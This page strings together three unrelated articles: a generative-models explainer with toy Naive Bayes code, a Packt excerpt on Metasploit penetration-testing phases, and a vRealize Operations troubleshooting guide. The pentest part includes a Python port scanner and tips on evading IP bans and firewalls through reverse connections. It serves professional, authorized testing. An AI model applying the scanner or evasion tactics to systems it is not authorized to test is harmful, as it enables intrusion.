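To make the distinction concrete, here is a from-scratch toy Bernoulli Naive Bayes (the two-feature "spam"/"ham" dataset is made up for illustration). Because it models the joint distribution p(x, y), it can recover the discriminative answer p(y|x) via Bayes' rule and also generate new samples, something a purely discriminative model cannot do.

```python
# Toy Bernoulli Naive Bayes illustrating the generative view:
# learn p(y) and p(x|y), then classify via Bayes' rule AND sample new data.
import random
from collections import Counter

# Hypothetical dataset: two binary features per example, two classes.
data = [((1, 1), "spam"), ((1, 0), "spam"), ((1, 1), "spam"),
        ((0, 0), "ham"),  ((0, 1), "ham"),  ((0, 0), "ham")]

# p(y): class priors
labels = [y for _, y in data]
prior = {y: c / len(data) for y, c in Counter(labels).items()}

# p(x_j = 1 | y): per-feature Bernoulli parameters with add-one smoothing
def feature_probs(cls):
    rows = [x for x, y in data if y == cls]
    return [(sum(r[j] for r in rows) + 1) / (len(rows) + 2) for j in range(2)]

theta = {y: feature_probs(y) for y in prior}

def joint(x, y):
    """p(x, y) = p(y) * prod_j p(x_j | y): the joint distribution."""
    p = prior[y]
    for j, v in enumerate(x):
        p *= theta[y][j] if v == 1 else 1 - theta[y][j]
    return p

def classify(x):
    # Discriminative answer recovered from the generative model:
    # argmax_y p(y|x) = argmax_y p(x, y)
    return max(prior, key=lambda y: joint(x, y))

def sample(rng):
    # Because we model p(x, y), we can also generate new data points.
    y = rng.choices(list(prior), weights=list(prior.values()))[0]
    x = tuple(int(rng.random() < t) for t in theta[y])
    return x, y

print(classify((1, 1)))           # prints "spam"
print(sample(random.Random(0)))   # a newly generated (features, label) pair
```

Note that the `joint` function sums to 1 over all (x, y) pairs, which is exactly what makes sampling from it meaningful.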
Generative models aim for a complete probabilistic description of the dataset. With generative models, the goal is to develop the joint probability distribution P(X, Y), either directly or by computing P(Y|X) and P(X) and then inferring the conditional probabilities required to classify newer data. This method requires more solid probabilistic thought than regression demands, but it provides a complete model of the probabilistic structure of the data. Knowing the joint distribution enables you to generate the data; hence, Naive Bayes is a generative model.

Suppose we have a supervised learning task, where x_i is the given features of the data points and y_i is the corresponding labels. One way to predict y on a future x is to learn a function f() from (x_i, y_i) that takes in x and outputs the most likely y. Such models fall into the category of discriminative models, as you are learning how to discriminate between x's from different classes. Methods like SVMs and neural networks fall into this category. Even if you're able to classify the data very accurately, you have no notion of how the data might have been generated.

The second approach is to model how the data might have been generated and learn a function f(x, y) that gives a score to the configuration determined by x and y together. Then you can predict y for a new x by finding the y for which the score f(x, y) is maximum. A canonical example of this is Gaussian mixture models.

Another example: you can imagine x to be an image and y to be a kind of object in the image, such as a dog. The probability written as p(y|x) tells us how much the model believes that there is a dog, given an input image, compared to all possibilities it knows about. Algorithms that try to model this probability map directly are called discriminative models. Generative models, on the other hand, try to learn a function called the joint probability p(y, x). We can read this as how much the model believes that x is an image and there is a dog y in it at the same time. These two probabilities are related, which can be written as p(y, x) = p(x) p(y|x), with p(x) being how likely it is that the input x is an image. The p(x) probability is usually called a density function in the literature.

The main reason to call these models generative ultimately connects to the fact that the model has access to the probability of both input and output at the same time. Using this, we can generate images of animals by sampling animal kinds y and new images x from p(y, x). We can also learn the density function p(x), which only depends on the input space.

Both models are useful; however, comparatively, generative models have an interesting advantage over discriminative models, namely, they have the potential to understand and explain the underlying structure of the input data even when there are no labels available. This is very desirable when working in the real world.

Types of generative models

Discriminative models have been at the forefront of the recent success in the field of machine learning. Such models make predictions that depend on a given input, although they are not able to generate new samples or data. The idea behind the recent progress of generative modeling is to convert the generation problem to a prediction one and use deep learning algorithms to learn such a problem.

Autoencoders

One way to convert a generative problem to a discriminative one is by learning the mapping from the input space itself. For example, we want to learn an identity map that, for each image x, would ideally predict the same image, namely, x = f(x), where f is the predictive model. This model may not be of use in its current form, but from it we can create a generative model.

Here, we create a model formed of two main components: an encoder model q(h|x) that maps the input to another space, referred to as the hidden or latent space and represented by h, and a decoder model q(x|h) that learns the opposite mapping, from the hidden space back to the input space. These components, the encoder and decoder, are connected together to create an end-to-end trainable model. Both the encoder and decoder models are neural networks of possibly different architectures, for example, RNNs and attention nets, to get the desired outcomes. Once the model is learned, we can detach the decoder from the encoder and use them separately. To generate a new data sample, we can first generate a sample from the latent space and then feed that to the decoder to create a new sample in the output space.

GAN

As seen with autoencoders, we can think of a general concept to create networks that will work together in a relationship, and training them will help us learn latent spaces that allow us to generate new data samples. Another type of generative network is the GAN, where we have a generator model q(x|h) to map a small-dimensional latent space h (usually represented as noise samples from a simple distribution) to the input space of x. This is quite similar to the role of the decoder in autoencoders. The deal is now to introduce a discriminative model p(y|x), which tries to associate an input instance x with a yes/no binary answer y about whether the generator model generated the input or it was a genuine sample from the dataset we are training on.

Let's use the image example from before. Assume that the generator model creates a new image, and we also have a real image from our actual dataset. If the generator model is good, the discriminator model will not be able to distinguish between the two images easily. If the generator model is poor, it will be very simple to tell which one is fake and which one is real. When both these models are coupled, we can train them end to end by ensuring that the generator model is getting better over time at fooling the discriminator model, while the discriminator model is trained to work on the harder problem of detecting frauds. Finally, we desire a generator model whose outputs are indistinguishable from the real data that we used for training. Through the initial parts of the training, the discriminator model can easily detect the samples coming from the actual dataset versus the ones generated synthetically by the generator model, which is just beginning to learn. As the generator gets better at modeling the dataset, we begin to see more and more generated samples that look similar to the dataset. The following example depicts the generated images of a GAN model learning over time:

Sequence models

If the data is temporal in nature, then we can use specialized algorithms called sequence models. These models can learn a probability of the form p(x_i | x_{i-1}, ..., x_1), where i is an index signifying the location in the sequence and x_i is the ith input sample. As an example, we can consider each word as a series of characters, each sentence as a series of words, and each paragraph as a series of sentences. An output y could be the sentiment of the sentence. Using a similar trick from autoencoders, we can replace y with the next item in the sequence, namely y_i = x_{i+1}, allowing the model to learn.

To summarize, generative models are a fast-advancing area of study and research. As we continue to advance these models and grow the training data and datasets, we can expect to generate data examples that depict completely believable images. These can be used in several applications such as image denoising, painting, structured prediction, and exploration in reinforcement learning.

To know more about how to build and optimize neural networks using TensorFlow, do check out the book Neural Network Programming with Tensorflow.
article-image-approaching-penetration-test-using-metasploit
Packt
26 Sep 2016
17 min read

Approaching a Penetration Test Using Metasploit

"In God I trust, all others I pen-test" - Binoj Koshy, cyber security expert

In this article by Nipun Jaswal, author of Mastering Metasploit, Second Edition, we will discuss penetration testing, which is an intentional attack on a computer-based system with the intention of finding vulnerabilities, figuring out security weaknesses, certifying that a system is secure, and gaining access to the system by exploiting these vulnerabilities. A penetration test will advise an organization whether it is vulnerable to an attack, whether the implemented security is enough to oppose any attack, which security controls can be bypassed, and so on. Hence, a penetration test focuses on improving the security of an organization.

(For more resources related to this topic, see here.)

Achieving success in a penetration test largely depends on using the right set of tools and techniques. A penetration tester must choose the right set of tools and methodologies in order to complete a test. While talking about the best tools for penetration testing, the first one that comes to mind is Metasploit. It is considered one of the most effective auditing tools to carry out penetration testing today. Metasploit offers a wide variety of exploits, an extensive exploit development environment, information gathering and web testing capabilities, and much more.

This article has been written so that it will not only cover the frontend perspectives of Metasploit, but also focus on the development and customization of the framework. This article assumes that the reader has basic knowledge of the Metasploit framework; however, some of its sections will help you recall the basics as well. While covering Metasploit from the very basics to the elite level, we will stick to a step-by-step approach, as shown in the following diagram:

This article will help you recall the basics of penetration testing and Metasploit, which will help you warm up to the pace of this article. In this article, you will learn about the following topics:

- The phases of a penetration test
- The basics of the Metasploit framework
- The workings of exploits
- Testing a target network with Metasploit
- The benefits of using databases

An important point to note here is that we might not become expert penetration testers in a single day. It takes practice, familiarization with the work environment, the ability to perform in critical situations, and most importantly, an understanding of how we have to cycle through the various stages of a penetration test.

When we think about conducting a penetration test on an organization, we need to make sure that everything is set perfectly and is according to a penetration test standard. Therefore, if you feel you are new to penetration testing standards or uncomfortable with the term Penetration testing Execution Standard (PTES), please refer to http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines to become more familiar with penetration testing and vulnerability assessments. According to PTES, the following diagram explains the various phases of a penetration test:

Refer to the http://www.pentest-standard.org website to set up the hardware and systematic phases to be followed in a work environment; these setups are required to perform a professional penetration test.

Organizing a penetration test

Before we start firing sophisticated and complex attack vectors with Metasploit, we must get comfortable with the work environment. Gathering knowledge about the work environment is a critical factor that comes into play before conducting a penetration test. Let us understand the various phases of a penetration test before jumping into Metasploit exercises, and see how to organize a penetration test on a professional scale.
Preinteractions The very first phase of a penetration test, preinteractions, involves a discussion of the critical factors regarding the conduct of a penetration test on a client's organization, company, institute, or network; this is done with the client. This serves as the connecting line between the penetration tester and the client. Preinteractions help a client get enough knowledge on what is about to be done over his or her network/domain or server. Therefore, the tester will serve here as an educator to the client. The penetration tester also discusses the scope of the test, all the domains that will be tested, and any special requirements that will be needed while conducting the test on the client's behalf. This includes special privileges, access to critical systems, and so on. The expected positives of the test should also be part of the discussion with the client in this phase. As a process, preinteractions discuss some of the following key points: Scope: This section discusses the scope of the project and estimates the size of the project. Scope also defines what to include for testing and what to exclude from the test. The tester also discusses ranges and domains under the scope and the type of test (black box or white box) to be performed. For white box testing, what all access options are required by the tester? Questionnaires for administrators, the time duration for the test, whether to include stress testing or not, and payment for setting up the terms and conditions are included in the scope. A general scope document provides answers to the following questions: What are the target organization's biggest security concerns? What specific hosts, network address ranges, or applications should be tested? What specific hosts, network address ranges, or applications should explicitly NOT be tested? 
Are there any third parties that own systems or networks that are in scope, and which systems do they own (written permission must have been obtained in advance by the target organization)?
Will the test be performed against a live production environment or a test environment?
Will the penetration test include the following testing techniques: ping sweep of network ranges, port scan of target hosts, vulnerability scan of targets, penetration of targets, application-level manipulation, client-side Java/ActiveX reverse engineering, physical penetration attempts, social engineering?
Will the penetration test include internal network testing? If so, how will access be obtained?
Are client/end-user systems included in the scope? If so, how many clients will be leveraged?
Is social engineering allowed? If so, how may it be used?
Are Denial of Service attacks allowed?
Are dangerous checks/exploits allowed?

Goals: This section discusses the various primary and secondary goals that a penetration test is set to achieve. The common questions related to the goals are as follows:

What is the business requirement for this penetration test?
It is required by a regulatory audit or standard
A proactive internal decision to determine all weaknesses

What are the objectives?
Map out vulnerabilities
Demonstrate that the vulnerabilities exist
Test the incident response
Actual exploitation of a vulnerability in a network, system, or application
All of the above

Testing terms and definitions: This section discusses basic terminology with the client and helps him or her understand the terms well.

Rules of engagement: This section defines the time of testing, the timeline, permissions to attack, and regular meetings to update the status of the ongoing test. The common questions related to the rules of engagement are as follows:

At what time do you want these tests to be performed?
During business hours
After business hours
Weekend hours
During a system maintenance window

Will this testing be done on a production environment?
If production environments should not be affected, does a similar environment (development and/or test systems) exist that can be used to conduct the penetration test?
Who is the technical point of contact?

For more information on preinteractions, refer to http://www.pentest-standard.org/index.php/File:Pre-engagement.png.

Intelligence gathering / reconnaissance phase

In the intelligence-gathering phase, you need to gather as much information as possible about the target network. The target network could be a website, an organization, or a full-fledged Fortune 500 company. The most important aspect is to gather information about the target from social media networks and use Google Hacking (a way to extract sensitive information from Google using specialized queries) to find sensitive information related to the target. Footprinting the organization using active and passive attacks can also be an approach.

The intelligence phase is one of the most crucial phases in penetration testing. Properly gained knowledge about the target will help the tester to simulate appropriate and exact attacks, rather than trying all possible attack mechanisms; it will also help save a large amount of time. This phase will consume 40 to 60 percent of the total time of the testing, as gaining access to the target depends largely upon how well the system is footprinted. It is the duty of a penetration tester to gain adequate knowledge about the target by conducting a variety of scans, looking for open ports, identifying all the services running on those ports, and deciding which services are vulnerable and how to make use of them to enter the desired system.
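The open-port discovery step described above can be sketched with Python's standard socket module. This is a minimal illustration of TCP connect scanning under lab conditions, not a substitute for a real scanner such as Nmap, and the example host and port list are placeholders:

```python
import socket

def scan_ports(host, ports, timeout=0.5):
    """Return the subset of `ports` that accept a TCP connection on `host`."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success instead of raising an exception
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports

# Example (hypothetical lab target):
# scan_ports("192.168.1.10", [22, 80, 443, 8080])
```

Each open port found this way feeds the next step: identifying the service behind it and deciding whether that service version is vulnerable.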
The procedures followed during this phase help identify the security policies currently in place at the target, and what we can do to breach them. Let us discuss this using an example.

Consider a black box test against a web server where the client wants a network stress test performed. Here, we will be testing the server to check what level of bandwidth and resource stress it can bear or, in simple terms, how the server responds to a Denial of Service (DoS) attack. A DoS attack, or a stress test, is the name given to the procedure of sending indefinite requests or data to a server in order to check whether the server is able to handle and respond to all the requests successfully or crashes, causing a DoS. A DoS can also occur if the target service is vulnerable to specially crafted requests or packets.

In order to achieve this, we start our network stress-testing tool and launch an attack towards the target website. However, after a few seconds of launching the attack, we see that the server is not responding to our browser and the website does not open. Additionally, a page shows up saying that the website is currently offline. So what does this mean? Did we successfully take out the web server we wanted? Nope! In reality, it is a sign of a protection mechanism set up by the server administrator that sensed our malicious intent of taking the server down and hence banned our IP address. Therefore, we must collect correct information and identify the various security services at the target before launching an attack.

The better approach is to test the web server from a different IP range. Maybe keeping two to three different virtual private servers for testing is a good approach. In addition, I advise you to test all the attack vectors in a virtual environment before launching them onto real targets.
A proper validation of the attack vectors is mandatory, because if we do not validate them prior to the attack, they may crash the service at the target, which is not favorable at all. Network stress tests should generally be performed towards the end of the engagement or in a maintenance window. Additionally, it is always helpful to ask the client to whitelist the IP addresses used for testing.

Now let us look at a second example. Consider a black box test against a Windows Server 2012 machine. While scanning the target server, we find that port 80 and port 8080 are open. On port 80, we find the latest version of Internet Information Services (IIS) running, while on port 8080 we discover a vulnerable version of the Rejetto HFS server, which is prone to a remote code execution flaw. However, when we try to exploit this vulnerable version of HFS, the exploit fails. This might be a common scenario where inbound malicious traffic is blocked by the firewall. In this case, we can simply change our approach to connecting back from the server, which will establish a connection from the target back to our system rather than us connecting to the server directly. This may prove to be more successful, as firewalls are commonly configured to inspect ingress traffic rather than egress traffic.

Coming back to the procedures involved in the intelligence-gathering phase, when viewed as a process they are as follows:

Target selection: This involves selecting the targets to attack, identifying the goals of the attack, and the time of the attack.
Covert gathering: This involves on-location gathering, the equipment in use, and dumpster diving. It also covers off-site gathering that involves data warehouse identification; this phase is generally considered only during a white box penetration test.
Footprinting: This involves active or passive scans to identify the various technologies used at the target, including port scanning, banner grabbing, and so on.
Identifying protection mechanisms: This involves identifying firewalls, filtering systems, network- and host-based protections, and so on.

For more information on gathering intelligence, refer to http://www.pentest-standard.org/index.php/Intelligence_Gathering.

Predicting the test grounds

A regular occurrence in penetration testers' lives is that when they start testing an environment, they know what to do next. If they come across a Windows box, they switch their approach towards the exploits that work perfectly for Windows and leave the rest of the options aside. An example of this might be an exploit for the NETAPI vulnerability, which is the most favorable choice for exploiting a Windows XP box. Suppose a penetration tester needs to visit an organization and, before going there, learns that 90 percent of the machines in the organization run Windows XP and some of them use Windows 2000 Server. The tester quickly decides to use the NETAPI exploit for the XP-based systems and the DCOM exploit for the Windows 2000 servers from Metasploit to complete the testing phase successfully. We will also see how to use these exploits practically in a later section of this article.

Consider another example of a white box test on a web server where the server is hosting ASP and ASPX pages. In this case, we switch our approach to use Windows-based exploits and IIS testing tools, ignoring the exploits and tools for Linux. Hence, predicting the environment under test helps build the strategy that we need to follow at the client's site.

For more information on the NETAPI vulnerability, visit http://technet.microsoft.com/en-us/security/bulletin/ms08-067.
For more information on the DCOM vulnerability, visit http://www.rapid7.com/db/modules/exploit/windows/dcerpc/ms03_026_dcom.

Modeling threats

In order to conduct a comprehensive penetration test, threat modeling is required. This phase focuses on modeling the correct threats, their effects, and their categorization based on the impact they can cause. Based on the analysis made during the intelligence-gathering phase, we can model the best possible attack vectors. Threat modeling applies to business asset analysis, process analysis, threat analysis, and threat capability analysis. This phase answers the following set of questions:

How can we attack a particular network?
Which crucial sections do we need to gain access to?
What approach is best suited for the attack?
What are the highest-rated threats?

Modeling threats will help a penetration tester to perform the following set of operations:

Gather relevant documentation about high-level threats
Identify an organization's assets on a categorical basis
Identify and categorize threats
Map threats to the assets of the organization

Modeling threats will help to define the highest-priority assets along with the threats that can influence these assets. Now, let us discuss a third example. Consider a black box test against a company's website. Here, information about the company's clients is the primary asset. It is also possible that, in a different database on the same backend, transaction records are also stored. In this case, an attacker can use the threat of a SQL injection to step over to the transaction records database. Hence, transaction records are the secondary asset. Mapping a SQL injection attack to the primary and secondary assets is achievable during this phase.

Vulnerability scanners such as Nexpose and the Pro version of Metasploit can help model threats clearly and quickly using an automated approach. This can prove handy while conducting large tests.
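The asset-to-threat mapping described above can be captured in a few lines of Python. The asset names, impact scores, and threat list below are hypothetical, chosen to mirror the website example (client records as the primary asset, transaction records as the secondary one):

```python
# Hypothetical assets with illustrative impact scores (higher = more critical).
assets = {
    "client_records_db": {"category": "primary", "impact": 9},
    "transaction_db": {"category": "secondary", "impact": 7},
    "public_website": {"category": "tertiary", "impact": 4},
}

# Hypothetical threats mapped to the assets they can reach.
threats = {
    "sql_injection": ["client_records_db", "transaction_db"],
    "defacement": ["public_website"],
}

def rank_threats(threats, assets):
    """Order threats by the highest impact among the assets they touch."""
    score = lambda t: max(assets[a]["impact"] for a in threats[t])
    return sorted(threats, key=score, reverse=True)
```

Ranking threats this way gives a simple, repeatable justification for which attack vectors to pursue first during a large test.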
For more information on the processes involved during the threat modeling phase, refer to http://www.pentest-standard.org/index.php/Threat_Modeling.

Vulnerability analysis

Vulnerability analysis is the process of discovering flaws in a system or an application. These flaws can vary from server and web application flaws to insecure application design, vulnerable database services, and VOIP- or SCADA-based services. This phase generally contains three different mechanisms: testing, validation, and research. Testing consists of active and passive tests. Validation consists of dropping false positives and confirming the existence of vulnerabilities through manual validation. Research refers to verifying a vulnerability that is found and triggering it to confirm its existence.

For more information on the processes involved during the vulnerability analysis phase, refer to http://www.pentest-standard.org/index.php/Vulnerability_Analysis.

Exploitation and post-exploitation

The exploitation phase involves taking advantage of the previously discovered vulnerabilities. This phase is considered the actual attack phase. In this phase, a penetration tester fires exploits at the target vulnerabilities of a system in order to gain access. This phase is covered heavily throughout the article. The post-exploitation phase is the latter phase of exploitation. It covers the various tasks that we can perform on an exploited system, such as elevating privileges, uploading/downloading files, pivoting, and so on.

For more information on the processes involved during the exploitation phase, refer to http://www.pentest-standard.org/index.php/Exploitation. For more information on post-exploitation, refer to http://www.pentest-standard.org/index.php/Post_Exploitation.
Reporting

Creating a formal report of the entire penetration test is the last phase to conduct while carrying out a penetration test. Identifying key vulnerabilities, creating charts and graphs, recommendations, and proposed fixes are a vital part of the penetration test report. An entire section dedicated to reporting is covered in the latter half of this article.

For more information on the processes involved during the reporting phase, refer to http://www.pentest-standard.org/index.php/Reporting.

Mounting the environment

Before going to war, soldiers must make sure that their artillery is working perfectly. This is exactly what we are going to follow. Testing an environment successfully depends on how well your test labs are configured. Moreover, a successful test answers the following set of questions:

How well is your test lab configured?
Are all the required tools for testing available?
How good is your hardware to support such tools?

Before we begin to test anything, we must make sure that all the required tools are available and that everything works perfectly.

Summary

Throughout this article, we have introduced the phases involved in penetration testing. We have also seen how we can set up Metasploit and conduct a black box test on the network. We recalled the basic functionalities of Metasploit as well. We saw how we could perform a penetration test on two different Linux boxes and Windows Server 2012. We also looked at the benefits of using databases in Metasploit. After completing this article, we are equipped with the following:

Knowledge of the phases of a penetration test
The benefits of using databases in Metasploit
The basics of the Metasploit framework
Knowledge of the workings of exploits and auxiliary modules
Knowledge of the approach to penetration testing with Metasploit

The primary goal of this article was to inform you about penetration test phases and Metasploit.
We will dive into the coding part of Metasploit and write our custom functionalities to the Metasploit framework.

Resources for Article:

Further resources on this subject:

Introducing Penetration Testing [article]
Open Source Intelligence [article]
Ruby and Metasploit Modules [article]
Troubleshooting techniques in vRealize Operations components

Vijin Boricha
06 Jun 2018
11 min read
vRealize Operations Manager helps in managing the health, efficiency, and compliance of virtualized environments. In this tutorial, we have covered the latest troubleshooting techniques of vRealize Operations. Let's see what we can do to monitor and troubleshoot the key vRealize Operations components and services. This is an excerpt from Mastering vRealize Operations Manager - Second Edition written by Spas Kaloferov, Scott Norris, and Christopher Slater.

Troubleshooting Services

Let's first take a look into some of the most important vRealize Operations services.

The Apache2 service

vRealize Operations internally uses the Apache2 web server to host the Admin UI, Product UI, and Suite API. Here are some useful service log locations:

Log file: access_log & error_log
Location: /storage/log/var/log/apache2
Purpose: Stores log information for the Apache service

The Watchdog service

Watchdog is a vRealize Operations service that maintains the necessary daemons/services and attempts to restart them as necessary should there be any failure. The vcops-watchdog is a Python script that runs every 5 minutes by means of the vcops-watchdog-daemon with the purpose of monitoring the various vRealize Operations services, including CaSA. The Watchdog service performs the following checks:

PID file of the service
Service status

Here are some useful service log locations:

Log file: vcops-watchdog.log
Location: /usr/lib/vmware-vcops/user/log/vcops-watchdog/
Purpose: Stores log information for the Watchdog service

The Collector service

The Collector service sends a heartbeat to the controller every 30 seconds. By default, the Collector will wait for 30 minutes for adapters to synchronize. The collector properties, including enabling or disabling Self Protection, can be configured from the collector.properties file located in /usr/lib/vmware-vcops/user/conf/collector.
Here are some useful service log locations:

Log file: collector.log
Location: /storage/log/vcops/log/
Purpose: Stores log information for the Collector service

The Controller service

The Controller service is part of the analytics engine. The controller does the decision making on where new objects should reside. It manages the storage and retrieval of the inventory of the objects within the system. The Controller service has the following uses:

It monitors the collector status every minute
It determines how long a deleted resource is available in the inventory
It determines how long a non-existing resource is stored in the database

Here are some useful service file locations:

File: controller.properties
Location: /usr/lib/vmware-vcops/user/conf/controller/
Purpose: Stores properties information for the Controller service

Databases

As we learned, vRealize Operations contains quite a few databases, all of which are of great importance for the function of the product. Let's take a deeper look into those databases.

Cassandra DB

Currently, Cassandra DB stores the following information:

User preferences and configuration
Alert definitions
Customizations
Dashboards, policies, and views
Reports and licensing
Shard maps
Activities

Cassandra stores all the information which we see in the content folder; basically, any settings which are applied globally. You are able to log into the Cassandra database from any analytic node. The information is the same across nodes. There are two ways to connect to the Cassandra database. The first is cqlsh, an inbuilt command-line tool (configured via the cqlshrc file) used to query the data within Cassandra in a SQL-like fashion.
To connect to the DB, run the following from the command line (SSH):

$VMWARE_PYTHON_BIN $ALIVE_BASE/cassandra/apache-cassandra-2.1.8/bin/cqlsh --ssl --cqlshrc $ALIVE_BASE/user/conf/cassandra/cqlshrc

Once you are connected to the DB, we need to navigate to the globalpersistence keyspace using the following command:

vcops_user@cqlsh> use globalpersistence ;

The second is the nodetool command-line tool. Once you are logged on to the Cassandra DB, we can run the following commands to see information:

Describe tables: Lists all the relations (tables) in the current database instance
Describe <table_name>: Lists the content of that particular table
Exit: Exits the Cassandra command line
select: Selects any column data from a table
delete: Deletes any column data from a table

Some of the important tables in Cassandra are:

activity_2_tbl: Stores all the activities
tbl_2a8b303a3ed03a4ebae2700cbfae90bf: Stores the shard mapping information of an object (the table name may differ in each environment)
supermetric: Stores the defined super metrics
policy: Stores all the defined policies
Auth: Stores all the user details in the cluster
global_settings: Stores all the configured global settings
namespace_to_classtype: Indicates what type of data is stored in which table under Cassandra
symptomproblemdefinition: Stores all the defined symptoms
certificates: Stores all the adapter and data source certificates

The Cassandra database has the following configuration files:

Cassandra.yaml: /usr/lib/vmware-vcops/user/conf/cassandra/
vcops_cassandra.properties: /usr/lib/vmware-vcops/user/conf/cassandra/
Cassandra conf scripts: /usr/lib/vmware_vcopssuite/utilities/vmware/vcops/cassandra/

The Cassandra.yaml file stores certain information such as the default location to save data (/storage/db/vcops/cassandra/data). The file contains information about all the nodes.
When a new node joins the cluster, it refers to this file to make sure it contacts the right node (the master node). It also has all the SSL certificate information. Cassandra is started and stopped via the CaSA service, but just because CaSA is running does not mean that the Cassandra service is necessarily running.

The service command to check the status of the Cassandra DB service from the command line (SSH) is:

service vmware-vcops status cassandra

The Cassandra cassandraservice.sh is located in:

$VCOPS_BASE/cassandra/bin/

Here are some useful Cassandra DB log locations (all in /usr/lib/vmware-vcops/user/log/cassandra):

System.log: Stores all the Cassandra-related activities
watchdog_monitor.log: Stores Cassandra Watchdog logs
wrapper.log: Stores Cassandra start- and stop-related logs
configure.log: Stores logs related to the Python scripts of vRealize Operations
initial_cluster_setup.log: Stores logs related to the Python scripts of vRealize Operations
validate_cluster.log: Stores logs related to the Python scripts of vRealize Operations

To enable debug logging for the Cassandra database, edit the logback.xml XML file located in:

/usr/lib/vmware-vcops/user/conf/cassandra/

Change <root level="INFO"> to <root level="DEBUG">. Note that System.log will not show the debug logs for Cassandra.

If you experience any of the following issues, this may be an indicator that the database has performance issues, and you may need to take the appropriate steps to resolve them:

Relationship changes are not reflected immediately
Deleted objects still show up in the tree
Views and reports are slow to process and take a long time to open
Logging on to the Product UI takes a long time for any user
An alert was supposed to trigger but never did

Cassandra can tolerate 5 ms of latency at any given point of time.
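The node load reported by the nodetool status health check covered in this section can also be parsed mechanically. The sample output below is abbreviated and hypothetical, and the 600 MB threshold mirrors the VMware guidance mentioned for the activity tables; treat this as a triage sketch, not an official tool:

```python
import re

# Abbreviated, hypothetical `nodetool status` output for illustration.
SAMPLE = """\
Datacenter: datacenter1
--  Address      Load       Tokens  Owns   Host ID  Rack
UN  10.10.10.1   512.3 MB   256     33.3%  aaaa     rack1
UN  10.10.10.2   645.8 MB   256     33.3%  bbbb     rack1
UN  10.10.10.3   121.4 KB   256     33.4%  cccc     rack1
"""

UNITS = {"KB": 1 / 1024, "MB": 1, "GB": 1024}

def overloaded_nodes(status_text, threshold_mb=600):
    """Return addresses whose reported load exceeds `threshold_mb` megabytes."""
    flagged = []
    for line in status_text.splitlines():
        # Status lines start with Up/Down + Normal/Leaving/Joining/Moving codes
        m = re.match(r"^[UD][NLJM]\s+(\S+)\s+([\d.]+)\s+(KB|MB|GB)", line)
        if m:
            addr, value, unit = m.group(1), float(m.group(2)), m.group(3)
            if value * UNITS[unit] > threshold_mb:
                flagged.append(addr)
    return flagged
```

Any address this returns would be a candidate to raise with VMware Global Support Services rather than fix unilaterally.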
You can validate the cluster by running the following command from the command line (SSH). First, navigate to the following folder:

/usr/lib/vmware-vcopssuite/utilities/

Run the following command to validate the cluster:

$VMWARE_PYTHON_BIN -m vmware.vcops.cassandra.validate_cluster <IP_ADDRESS_1 IP_ADDRESS_2>

You can also use nodetool to perform a health check, and possibly resolve database load issues. The command to check the load status of the activity tables in vRealize Operations version 6.3 and older is as follows:

$VCOPS_BASE/cassandra/apache-cassandra-2.1.8/bin/nodetool --port 9008 status

For the 6.5 release and newer, VMware added the requirement of using a maintenanceAdmin user along with a password file. The new command is as follows:

$VCOPS_BASE/cassandra/apache-cassandra-2.1.8/bin/nodetool -p 9008 --ssl -u maintenanceAdmin --password-file /usr/lib/vmware-vcops/user/conf/jmxremote.password status

Regardless of which method you choose to perform the health check, if any of the nodes has over 600 MB of load, you should consult with VMware Global Support Services on the next steps to take and how to alleviate the load issues.

Central (Repl DB)

The Postgres database was introduced in 6.1. It has two instances in version 6.6: the Central Postgres DB, also called repl, and the Alerts/HIS Postgres DB, also called data, which are two separate database instances under the database called vcopsdb. The central DB exists only on the master and the master replica nodes when HA is enabled. It is accessible via port 5433 and is located in /storage/db/vcops/vpostgres/repl. Currently, the database stores the resource inventory.

You can connect to the central DB from the command line (SSH). Log in on the analytic node you wish to connect to and run:

su - postgres

The command should not prompt for a password if run as root.
Once logged in, connect to the database instance by running:

/opt/vmware/vpostgres/current/bin/psql -d vcopsdb -p 5433

The service command to start the central DB from the command line (SSH) is:

service vpostgres-repl start

Here are some useful log locations:

Log file: postgresql-<xx>.log
Location: /storage/db/vcops/vpostgres/data/pg_log
Purpose: Provides information on Postgres database cleanup and other disk-related information

Alerts/HIS (Data) DB

The Alerts DB is called data on all the data nodes, including the master and master replica nodes. It was introduced in 6.1. Starting from 6.2, the Historical Inventory Service xDB was merged with the Alerts DB. It is accessible via port 5432 and is located in /storage/db/vcops/vpostgres/data. Currently, the database stores:

Alert and alarm history
History of resource property data
History of resource relationships

You can connect to the Alerts DB from the command line (SSH). Log in on the analytic node you wish to connect to and run:

su - postgres

The command should not prompt for a password if run as root. Once logged in, connect to the database instance by running:

/opt/vmware/vpostgres/current/bin/psql -d vcopsdb -p 5432

The service command to start the Alerts DB from the command line (SSH) is:

service vpostgres start

FSDB

The File System Database (FSDB) contains all raw time series metrics and super metrics data for the discovered resources. What is FSDB in vRealize Operations Manager? FSDB is a GemFire server that runs inside the analytics JVM. FSDB in vRealize Operations uses the Sharding Manager to distribute data between nodes (new objects). (We will discuss what vRealize Operations cluster nodes are later in this chapter.) The File System Database is available on all the nodes of a vRealize Operations cluster deployment. It has its own properties file.
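The idea behind the Sharding Manager mentioned above, distributing objects across nodes, can be illustrated with a tiny hash-based sketch. This is not vRealize Operations' actual algorithm, and the node names are placeholders; it only shows why a deterministic mapping lets any node find where an object's data lives:

```python
import hashlib

def shard_for(object_id, nodes):
    """Deterministically map an object ID to one node (illustrative only)."""
    # Hash the ID so the same object always lands on the same node,
    # and objects spread roughly evenly across the node list.
    digest = hashlib.md5(object_id.encode()).hexdigest()
    return nodes[int(digest, 16) % len(nodes)]

# Example with hypothetical node names:
# shard_for("vm-42", ["node-1", "node-2", "node-3"])
```

Because the mapping is deterministic, a lookup tool (like the shard-mapping query shown later with vrops-platform-cli) can locate an object's data without broadcasting to every node.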
FSDB stores data (time series data) collected by adapters as well as data that is generated/calculated (system, super, badge, and CIQ metrics, and so on) based on analysis of that data.

If you are troubleshooting FSDB performance issues, you should start from the Self Performance Details dashboard, more precisely the FSDB Data Processing widget. We covered both of these earlier in this chapter. You can also take a look at the metrics provided by the FSDB metric picker. You can access it by navigating to the Environment tab, then vRealize Operations Clusters, selecting a node, and selecting vRealize Operations Manager FSDB. Then, select the All Metrics tab.

You can check the synchronization state of the FSDB to determine the overall health of the cluster by running the following command from the command line (SSH):

$VMWARE_PYTHON_BIN /usr/lib/vmware-vcops/tools/vrops-platform-cli/vrops-platform-cli.py getShardStateMappingInfo

